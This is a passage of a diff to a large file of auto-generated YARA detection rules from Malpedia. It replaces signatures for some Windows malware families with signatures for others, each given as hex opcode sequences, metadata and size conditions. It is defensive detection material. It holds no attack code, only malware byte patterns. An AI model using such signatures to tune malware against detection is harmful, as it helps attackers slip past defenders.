+		$sequence_5 = { 8d9dc8f9ffff 891c24 e8???????? 8d8568f9ffff 89442424 89742420 }
+		$sequence_6 = { 85c0 0f84cc000000 897c2410 8d85e0feffff 8944240c 89742408 }
+		$sequence_7 = { 8b5d08 8b4514 8945f4 c745f001000000 8d45f8 }
+		$sequence_8 = { ffd0 8b15???????? 83eb04 39d3 73eb 8d742600 }
+		$sequence_9 = { 83ec04 b800000000 eb21 8b85d8feffff 890424 e8???????? }
 
 	condition:
-		7 of them and filesize < 584704
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Doplugs_Auto : FILE
+rule MALPEDIA_Win_Tiop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25bc6674-e80a-5978-bdcd-775785ac724e"
+		id = "6a354c9f-7033-5930-8cdf-ccc9b036cb6a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doplugs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doplugs_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tiop_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "f953831840b57858258557fc6d861ade3d3cd53d14e6b5f923d0ab7ef61db359"
+		logic_hash = "8dde382911bda80f4443cb56d55614794d75f26151cbf4838080e27ec3645e3d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120409,32 +120754,32 @@ rule MALPEDIA_Win_Doplugs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebc7 c60000 40 b988e80fa2 ba0977e673 3b45d8 0f44ca }
-		$sequence_1 = { ba7c5c3f74 ebd4 8a44240b be420360ff 884203 c7042469000000 81fe7c5c3f74 }
-		$sequence_2 = { ebb4 3d3c391092 0f84c4000000 3d3c69c7d0 75a2 8b45c8 8b45c8 }
-		$sequence_3 = { f6d0 248d 08c2 8b442408 88d6 80f24c 80f6b3 }
-		$sequence_4 = { e9???????? 8b4de4 e8???????? 8b4dbc 83c130 6a20 51 }
-		$sequence_5 = { e9???????? 31c0 b9c9efbb33 81f94e706309 7e21 81f92b388626 7f4e }
-		$sequence_6 = { c74424044363617e c744240869436b67 66c744240c6c7b 896c242c c644240e73 890424 8d44240f }
-		$sequence_7 = { f7d3 21cb 09de bb351d2051 31fe 6689742414 ebbd }
-		$sequence_8 = { b927018432 e9???????? 8b0c24 01e9 894c2410 8b4c2410 8a09 }
-		$sequence_9 = { f7d2 21da 09d0 8b542414 31c8 668902 8b0424 }
+		$sequence_0 = { 3be9 72e9 8b9e4c050000 83c9ff 8bfb 33c0 }
+		$sequence_1 = { 8b4608 50 ff15???????? 8b4e10 6a0d 51 }
+		$sequence_2 = { 5d 81c484000000 c20800 892e 5f 5e 33c0 }
+		$sequence_3 = { 8b15???????? 68f0000000 8d4c2460 89442464 6a04 8d44242a 51 }
+		$sequence_4 = { b90c000000 33c0 bf???????? f3ab 66ab 8bfa 83c9ff }
+		$sequence_5 = { 51 ff15???????? b908020000 33c0 8dbc2499090000 c684249809000000 }
+		$sequence_6 = { 56 ff15???????? 6a05 56 ff15???????? 68???????? 68e8030000 }
+		$sequence_7 = { 8b942448080000 55 51 8d442428 52 50 899c244c080000 }
+		$sequence_8 = { 8b10 6a00 8bc8 c744241000000000 ff12 8d4c2414 c744240cffffffff }
+		$sequence_9 = { 85c0 7502 5e c3 b9???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 1355776
+		7 of them and filesize < 712704
 }
-rule MALPEDIA_Win_Mgbot_Auto : FILE
+rule MALPEDIA_Win_Mechanical_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd03dc94-bb3a-5cad-8f13-4bbe4b7f90a6"
+		id = "f58702e9-e83b-59f3-ba4d-4c871c835d79"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mgbot_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mechanical_auto.yar#L1-L154"
 		license_url = "N/A"
-		logic_hash = "7310ce51cc81391fc78e9881bf8f490b2a783d4789728f7661df3e6bdca512d7"
+		logic_hash = "94b14ca845d1ee4d0c436cd1fe538aa0afa038eac7ee0713fa70a64141fc5c86"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120448,32 +120793,38 @@ rule MALPEDIA_Win_Mgbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5b 8be5 5d c20800 6808020000 e8???????? }
-		$sequence_1 = { 8be5 5d c20800 6808020000 e8???????? }
-		$sequence_2 = { 5d c20800 6808020000 e8???????? }
-		$sequence_3 = { 5b 8be5 5d c20800 6808020000 }
-		$sequence_4 = { 0f8553ffffff 5f 33c0 5e }
-		$sequence_5 = { 6808020000 e8???????? 6804010000 8bf0 }
-		$sequence_6 = { 8be5 5d c20800 6808020000 }
-		$sequence_7 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 }
-		$sequence_8 = { 6808020000 e8???????? 6804010000 8bf0 6a00 }
-		$sequence_9 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 e8???????? }
+		$sequence_0 = { 488d0d7a500000 ff15???????? 4885c0 488be8 }
+		$sequence_1 = { 033485c0e54200 8b45e4 8b00 8906 }
+		$sequence_2 = { 03c7 3bca 72ed 5f }
+		$sequence_3 = { 4983c001 84c9 7409 4983c101 }
+		$sequence_4 = { 0401 3cbe 8844240b 76e2 }
+		$sequence_5 = { 03c1 1bc9 0bc1 59 e9???????? e8???????? ff742404 }
+		$sequence_6 = { 90 0100 e392 0100 c88f0100 }
+		$sequence_7 = { 84c0 0f8409000000 4983c001 4885c9 75e8 4585c0 0f84d0010000 }
+		$sequence_8 = { 3c5a 770a 0420 41b801000000 8802 }
+		$sequence_9 = { 75ed 488d8c2460210000 4d8bc4 6690 }
+		$sequence_10 = { 030495c0e54200 eb05 b8???????? f6400420 }
+		$sequence_11 = { 00686c 42 0023 d18a0688078a }
+		$sequence_12 = { 33c0 488bbc2468010000 488b9c2460010000 488b8c2430010000 }
+		$sequence_13 = { 4885c9 75ec 4585c0 0f84bd010000 }
+		$sequence_14 = { 03ce c6840c3801000000 8d8424a05c0000 33f6 }
+		$sequence_15 = { 033485c0e54200 c745e401000000 33db 395e08 }
 
 	condition:
-		7 of them and filesize < 1677312
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Kwampirs_Auto : FILE
+rule MALPEDIA_Win_Webmonitor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c831c38-f3af-5c4b-940a-effdace44ac1"
+		id = "a4fb11db-5000-556c-8a5e-92fa710a7bf2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kwampirs_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webmonitor_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "05da0209b4ac4234af04c94a25b568ea854e2af3b982527383637ef20b197483"
+		logic_hash = "dae97ec3da1552d8829942df4314bf12da735041179d90d1884bc5549bf4d3f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120487,34 +120838,40 @@ rule MALPEDIA_Win_Kwampirs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 e8???????? 83c404 a3???????? 33f6 }
-		$sequence_1 = { 83c418 85c0 7512 8b07 }
-		$sequence_2 = { 7512 8b07 50 e8???????? 83c404 891f }
-		$sequence_3 = { f7d9 0bc8 51 e8???????? 83c404 a3???????? 33f6 }
-		$sequence_4 = { e8???????? 83c404 8a45e7 8b4df0 64890d00000000 }
-		$sequence_5 = { 33c5 50 8d45f0 64a300000000 8965e8 8bf9 33db }
-		$sequence_6 = { 668955f4 33d2 668955f6 e8???????? }
-		$sequence_7 = { 8d45f0 64a300000000 8965e8 8bf9 33db }
-		$sequence_8 = { 6a01 56 8b0f 51 e8???????? 83c418 }
-		$sequence_9 = { 56 8b0f 51 e8???????? 83c418 85c0 }
+		$sequence_0 = { 72ff 800c0043 6c ff8010004368 ff1e 0a01 800c004a }
+		$sequence_1 = { 43 ec fe04ec fe05???????? 000d???????? 04c8 }
+		$sequence_2 = { a4 44 43 00dc 7442 000477 }
+		$sequence_3 = { 41 0084e84100a872 42 00a06a4200f8 b642 }
+		$sequence_4 = { 3a58ff 2503fd006c ff1e e00e 000e }
+		$sequence_5 = { ff05???????? 000d???????? 04b8 fe04f4 fd }
+		$sequence_6 = { 41 00baa4f34100 b9???????? ffe1 ba???????? }
+		$sequence_7 = { 0512002413 000d???????? 04f4 fd 0468 ff05???????? }
+		$sequence_8 = { 00e8 dd7000 008bf98b5d1c 8d4de4 }
+		$sequence_9 = { 00d1 6848007269 48 00856948008b }
+		$sequence_10 = { 0108 eb5a 8b4508 83ceff }
+		$sequence_11 = { 0108 8b442410 891e 894604 }
+		$sequence_12 = { 00d1 6848004069 48 00d1 }
+		$sequence_13 = { 000f b681 fc b84500ff24 }
+		$sequence_14 = { 00e8 f61c00 008bd9895df0 8b451c }
+		$sequence_15 = { 00856948008b ff558b ec 83ec0c }
 
 	condition:
-		7 of them and filesize < 2695168
+		7 of them and filesize < 1867776
 }
-rule MALPEDIA_Win_Flawedammyy_Auto : FILE
+rule MALPEDIA_Win_Disk_Knight_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "869ded56-7b9a-5ec5-b348-fd92c863b7a6"
+		id = "1b68d176-e621-572e-a02b-4eff18ee7835"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flawedammyy_auto.yar#L1-L306"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disk_knight"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.disk_knight_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1cd6d61d60d4c415e6c8e37367c9ce0c64744bcdc60e8edfc1af0f4b4c964dec"
+		logic_hash = "09ce3baeb29e85d6695478868b4b5a99498537909676146b33cec4463b3e4ba4"
 		score = 75
-		quality = 33
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120526,54 +120883,32 @@ rule MALPEDIA_Win_Flawedammyy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ffd7 8d85fcfeffff 50 8d85ccf2ffff 68???????? }
-		$sequence_1 = { 0022 8a4200 828a4200bb8a42 00ff }
-		$sequence_2 = { 004bbf 42 0062bf 42 }
-		$sequence_3 = { 8d85bcfdffff 50 ffd3 8b45fc }
-		$sequence_4 = { 8d8548ffffff 6a00 50 660fd645ac 660fd645b4 e8???????? }
-		$sequence_5 = { 68???????? 6a00 6a00 ff15???????? 8b3d???????? 6830750000 ffd7 }
-		$sequence_6 = { 66898534ffffff ffd7 85c0 750f 68???????? ffd7 }
-		$sequence_7 = { 0000 0404 0404 0404 0401 }
-		$sequence_8 = { 00b3854200e5 854200 37 864200 }
-		$sequence_9 = { 85c0 782d 8b7dfc 2b7df4 8b7514 037d08 6a00 }
-		$sequence_10 = { 0018 874200 58 874200 }
-		$sequence_11 = { 0039 e342 0048e3 42 }
-		$sequence_12 = { ff15???????? 85c0 0f885e010000 6a00 6a00 6a00 }
-		$sequence_13 = { 002a e342 0039 e342 }
-		$sequence_14 = { ff75fc ff15???????? 85c0 740c 68???????? }
-		$sequence_15 = { 0062bf 42 0079bf 42 }
-		$sequence_16 = { 59 8945c4 eb17 68???????? 56 }
-		$sequence_17 = { 8b04855c303400 c1e002 50 6a40 ff15???????? 8906 43 }
-		$sequence_18 = { e9???????? 895df4 8d41de 33db 83f855 0f872affffff 0fb6805a213400 }
-		$sequence_19 = { ff248580233400 832700 e9???????? 55 e8???????? eb1a 55 }
-		$sequence_20 = { ff15???????? 8b45f0 395d08 88987830ca01 0f8484010000 ff75fc }
-		$sequence_21 = { ff75fc e8???????? f6450801 7412 }
-		$sequence_22 = { ff15???????? 8b4dc8 03ce 3bc1 761f 6aff ff75a8 }
-		$sequence_23 = { e8???????? 8b4d08 8a0408 a2???????? eb07 c605????????00 c705????????4c403400 }
-		$sequence_24 = { 83f907 0f8781000000 ff248dfd243400 881f eb76 }
-		$sequence_25 = { 5e 5b c3 55 8bec 81ec5c040000 53 }
-		$sequence_26 = { 894dfc eb0e 8b14957c303400 49 0fafd1 0155fc }
-		$sequence_27 = { 0f872affffff 0fb6805a213400 ff2485f6203400 8b8614080000 3b45f4 }
-		$sequence_28 = { 895da8 ab ab ab ff15???????? }
-		$sequence_29 = { 80bda4fbffff22 8d85a4fbffff 750a c645ff22 8d85a5fbffff 8b35???????? }
-		$sequence_30 = { ff75e0 ffd7 ff75cc ffd7 8d46fe 3b45f4 }
-		$sequence_31 = { 8bdf 8b06 83661c00 83f807 0f87c9000000 ff248580233400 }
+		$sequence_0 = { 56 56 8b45c4 50 8d4dc0 51 8b3d???????? }
+		$sequence_1 = { ff15???????? 8945a8 a1???????? bf03000000 c745a008000000 85c0 895d88 }
+		$sequence_2 = { 8b06 ff5004 8b4d0c 8d55e8 897de8 8b3d???????? 51 }
+		$sequence_3 = { ff15???????? a1???????? 83c410 3bc3 7510 68???????? 68???????? }
+		$sequence_4 = { 8945cc 895dc4 c7459403400000 8b07 51 52 57 }
+		$sequence_5 = { 8955d8 897dd0 897dcc 897dc8 897dc4 897dc0 897dbc }
+		$sequence_6 = { 894da8 8b4dd4 b80a000000 68???????? 51 894590 8945a0 }
+		$sequence_7 = { db464c dd9d14ffffff 833d????????00 7508 dcb514ffffff eb11 ffb518ffffff }
+		$sequence_8 = { 8985c8fdffff eb0a c785c8fdffff00000000 833d????????00 751c 68???????? 68???????? }
+		$sequence_9 = { 7d0e 68d8000000 68???????? 56 50 ffd3 8b0e }
 
 	condition:
-		7 of them and filesize < 1350656
+		7 of them and filesize < 868352
 }
-rule MALPEDIA_Win_Mikoponi_Auto : FILE
+rule MALPEDIA_Win_Squirrelwaffle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4800c6d3-16db-53d7-bb1f-1cb0040fb556"
+		id = "c61157f1-60e2-5b06-a116-a20987079807"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mikoponi_auto.yar#L1-L109"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.squirrelwaffle_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "6fec244d34dfdfffb8f190bd531090181ff56cb0a8f461ac3c66e10426835858"
+		logic_hash = "9eaea34205659a464bf5b301bb94e11eb962293c24be78788f1b35d437de22a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120587,30 +120922,32 @@ rule MALPEDIA_Win_Mikoponi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 52 c744242004000000 ff15???????? 83bc242002000000 }
-		$sequence_1 = { 81ec1c020000 a1???????? 33c4 89842418020000 8b842424020000 2d10010000 }
-		$sequence_2 = { 803d????????00 7521 8b542410 52 68???????? e8???????? }
-		$sequence_3 = { 53 ff15???????? 88442413 807c241300 7480 03742424 }
-		$sequence_4 = { e8???????? 83c408 85c0 7405 bd01000000 5f 33c0 }
-		$sequence_5 = { 50 8d8c2420020000 51 e8???????? 83c408 391d???????? 7516 }
-		$sequence_6 = { ff15???????? 50 6a00 6800110000 ff15???????? 8b1424 52 }
-		$sequence_7 = { 56 68???????? e8???????? 83c408 5e 8bc3 5b }
+		$sequence_0 = { ff15???????? 8bd8 83c40c 85db 0f84d0000000 8bce }
+		$sequence_1 = { c7855cf7ffff00000000 c78560f7ffff0f000000 8b00 3bc7 c6854cf7ffff00 0f42f8 833910 }
+		$sequence_2 = { 0f8484000000 8d442410 50 ff764c }
+		$sequence_3 = { 8d8d18f9ffff 51 68???????? 50 ff15???????? 85c0 }
+		$sequence_4 = { 8d4dd8 ff75cc 6a08 e8???????? e9???????? b301 }
+		$sequence_5 = { 0f88da000000 83f801 0f8fa8000000 8b75e8 8d45d4 8b7dd4 }
+		$sequence_6 = { 8bca 0430 8806 8bc2 898568f7ffff }
+		$sequence_7 = { 2bc1 83f808 7221 8d4108 83fe10 8945e4 }
+		$sequence_8 = { 6a08 e8???????? e9???????? 8b5d08 eb32 }
+		$sequence_9 = { c645cc00 8d4dd8 ff75cc 6a08 }
 
 	condition:
-		7 of them and filesize < 330752
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Tofsee_Auto : FILE
+rule MALPEDIA_Win_Concealment_Troy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "77c418f3-cea7-5bdf-bba1-bed4438fce6c"
+		id = "f25da06b-e34f-5ec3-afca-981eed54a3f2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tofsee_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.concealment_troy_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "072fc19fe47ee3a53dbd73b9def787fe701419f7ff08ef93e84b3d80d7a1f117"
+		logic_hash = "5ef8bd4e1cd35f7f8cc8bada75a137689ed8949f72f34f8e30aca42d1738a1ce"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120624,32 +120961,32 @@ rule MALPEDIA_Win_Tofsee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 55 8bec 6864006400 ff7514 ff15???????? }
-		$sequence_1 = { ff7508 8d45e4 50 e8???????? 85c0 59 59 }
-		$sequence_2 = { 837f0800 7408 8b36 33ff 391e 75e1 85ff }
-		$sequence_3 = { e8???????? 8b35???????? 81fe???????? 59 7470 395e08 746b }
-		$sequence_4 = { 8b0d???????? 85c9 7503 33c0 c3 8bc1 56 }
-		$sequence_5 = { 8b4510 59 59 8b4d18 85c9 8945d8 8b4514 }
-		$sequence_6 = { ff35???????? ff742414 e8???????? 85c0 59 59 7474 }
-		$sequence_7 = { 50 687e660480 56 897d08 ffd3 83f8ff 750d }
-		$sequence_8 = { c745f001000000 eb46 53 ff7510 8d443730 50 }
-		$sequence_9 = { 8b7508 83c608 8bc6 8d4801 8a10 40 3ad3 }
+		$sequence_0 = { 2bc2 50 8d942468050000 52 }
+		$sequence_1 = { 83c410 8d542424 52 8d442438 50 6a00 6a00 }
+		$sequence_2 = { 8bc8 83e103 f3a4 8d542418 8d8c2430090000 e8???????? 85c0 }
+		$sequence_3 = { 8d3c8da0774100 8b0f c1e606 833c0eff }
+		$sequence_4 = { 6800100000 8d84249c030000 6a00 50 e8???????? }
+		$sequence_5 = { 8d842420010000 e8???????? 8d542418 8d9b00000000 8a08 }
+		$sequence_6 = { 8b7588 8b7d8c b940000000 f3a5 }
+		$sequence_7 = { 3acb 75f9 2bc2 807c041722 }
+		$sequence_8 = { e8???????? 83c414 807c24104d 0f85b1000000 807c24115a 0f85a6000000 53 }
+		$sequence_9 = { 57 ff15???????? 5d 5f 33c0 5e 8b8c2420010000 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Goopic_Auto : FILE
+rule MALPEDIA_Win_Photoloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "46e7b93a-a824-528f-bd94-0b2f369fa2ff"
+		id = "a08024a5-b726-5fe7-bae6-d20cf144169e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.goopic_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.photoloader_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "84ac631e9a300a568150cf088c579ef5611f1aa361740898f3a2d1d9e24582a8"
+		logic_hash = "23120e8333171e7b242a43c78525c83b36a92ed0c9ad8db34350941d5629fd06"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120663,32 +121000,38 @@ rule MALPEDIA_Win_Goopic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff5158 8b442410 ff742430 50 8b08 }
-		$sequence_1 = { 68???????? ff15???????? 8d85f8f7ffff 50 6a02 }
-		$sequence_2 = { ff15???????? 83bdf0efffff00 7409 83bdf8efffff00 77a4 }
-		$sequence_3 = { 751d 6683bdfcfeffff37 7513 b801000000 8b4dfc 33cd }
-		$sequence_4 = { 8945fc 57 6a52 6a40 ff15???????? 8bf8 }
-		$sequence_5 = { 68???????? 8d85fcf7ffff 50 ff15???????? 6a02 68???????? ff15???????? }
-		$sequence_6 = { 744b 83f873 7446 83f874 }
-		$sequence_7 = { 8d4910 660f70c000 83c004 660ffec1 f30f7f41f0 3d00010000 7ce1 }
-		$sequence_8 = { 7cb2 33ff 397d08 766e 41 81e1ff000080 }
-		$sequence_9 = { a3???????? 85c0 750a ff742424 ff15???????? }
+		$sequence_0 = { 0fa2 894704 33c9 b800000040 }
+		$sequence_1 = { b800000040 0fa2 895f0c e8???????? }
+		$sequence_2 = { f7411400000020 7407 8b41f8 3901 }
+		$sequence_3 = { b801000000 0fa2 89442420 895c2424 894c2428 8954242c }
+		$sequence_4 = { 25ffffff00 0d00000005 e9???????? 8bd7 397b1c 7640 8bc2 }
+		$sequence_5 = { c0c003 0fb6c8 8bc1 83e10f }
+		$sequence_6 = { 8bf7 8d6f10 ff15???????? 0f31 }
+		$sequence_7 = { 488b5c2408 c3 0f31 4f8d1489 48c1e220 478b4cd308 480bc2 }
+		$sequence_8 = { ff15???????? 25ffffff00 0d00000007 eb4a }
+		$sequence_9 = { 7507 66c74424287800 8d442428 ba???????? }
+		$sequence_10 = { 85f6 7431 8b06 33ff 8bce 47 eb05 }
+		$sequence_11 = { 8bf0 8d6c2410 33c9 b801000080 0fa2 894500 895d04 }
+		$sequence_12 = { 741a 57 8bfb 8bc8 2bfa 66890c17 }
+		$sequence_13 = { ff15???????? 8bf0 85f6 746d 8d442418 50 8d442414 }
+		$sequence_14 = { ff542420 0f31 8bc8 8bf2 0f31 }
+		$sequence_15 = { e8???????? 03f8 8d0c7b e8???????? 8bc3 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 107520
 }
-rule MALPEDIA_Win_Scout_Auto : FILE
+rule MALPEDIA_Win_Coredn_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "badacd81-959a-5316-bd3b-4267a7a059cc"
+		id = "56ae3d0f-275e-5068-a1a8-add140ea339b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scout"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scout_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.coredn_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "45093eb9e440370fa3e5ca64b63b1022aa2768448d9bb6e9d805f1e4a716e0bc"
+		logic_hash = "3e99d32cb9f6585a539057b215782ae24308a0cdeed56e6718c13cdaa1226877"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120702,34 +121045,39 @@ rule MALPEDIA_Win_Scout_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 4883ec20 488bd9 488d3d5cd1feff 488bcf e8???????? 85c0 }
-		$sequence_1 = { ff15???????? 488d0d80960100 eb0c 83f901 }
-		$sequence_2 = { 488d050ef70000 4a8b04e8 42385cf838 0f8df5000000 e8???????? }
-		$sequence_3 = { 488bd9 4c8d0d38c00000 b91c000000 4c8d0528c00000 488d1525c00000 e8???????? 4885c0 }
-		$sequence_4 = { 85c0 7410 488d0d98ca0100 4883c428 e9???????? e8???????? }
-		$sequence_5 = { c745d41398db1a c745d862452312 c745dca8837182 0f1045d0 c744242801000000 }
-		$sequence_6 = { 418ac7 84c0 0f8408010000 8b4c2448 488d15d214ffff 2b4c244c }
-		$sequence_7 = { b84d5a0000 663905c5ccffff 7578 48630df8ccffff 488d15b5ccffff 4803ca 813950450000 }
-		$sequence_8 = { 4883f80e 7773 8b8486bc010100 4803c6 ffe0 }
-		$sequence_9 = { e8???????? 48391d???????? 7505 83c8ff eb75 488beb 488d35634f0100 }
+		$sequence_0 = { 51 56 8d45fc 8bf1 50 e8???????? 85c0 }
+		$sequence_1 = { 2bf1 6690 8d82fafeff7f 85c0 741c 8a040e 84c0 }
+		$sequence_2 = { 57 bf00000000 8d0432 2bca 7438 }
+		$sequence_3 = { 8851ff b87a000780 5e 5d }
+		$sequence_4 = { 8a040e 84c0 7415 8801 41 83ea01 }
+		$sequence_5 = { 5e 8be5 5d c20400 85c9 7506 48 }
+		$sequence_6 = { 03d1 2bf0 85d2 7423 8a1c06 84db 741c }
+		$sequence_7 = { 84db 741c 8818 4a 40 }
+		$sequence_8 = { 8b0cc5ac1b4100 894de4 85c9 7455 8b4510 8945e8 8b4514 }
+		$sequence_9 = { 83c00c 83e03f 8a80b81c4100 88040a 8b06 }
+		$sequence_10 = { 8d3c8530404100 8b0f 85c9 740b 8d4101 f7d8 }
+		$sequence_11 = { 83e03f c1ff06 6bd830 8b04bd08414100 f644032801 7444 }
+		$sequence_12 = { 6bc618 57 8db8d83e4100 57 ff15???????? }
+		$sequence_13 = { 8b1c85e8dd4000 56 6800080000 6a00 53 ff15???????? }
+		$sequence_14 = { 83c40c 6b45e430 8945e0 8d80a8304100 }
 
 	condition:
-		7 of them and filesize < 315392
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Hookinjex_Auto : FILE
+rule MALPEDIA_Win_Spica_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71399701-93a4-54b6-a1f8-3cb7f4c94c21"
+		id = "b6a1a6a9-846d-5070-af66-e8c23c4a6b50"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hookinjex_auto.yar#L1-L157"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spica"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spica_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "8fbd3eb9a9d2410863924e40f8ff07b371959d0645dbb4e7cd7484e6ff1ff474"
-		score = 60
-		quality = 25
+		logic_hash = "a88bf3ca9882c583346cf58a04e5a1e9985797df2dfd737cf0e029b406925de0"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120741,38 +121089,32 @@ rule MALPEDIA_Win_Hookinjex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
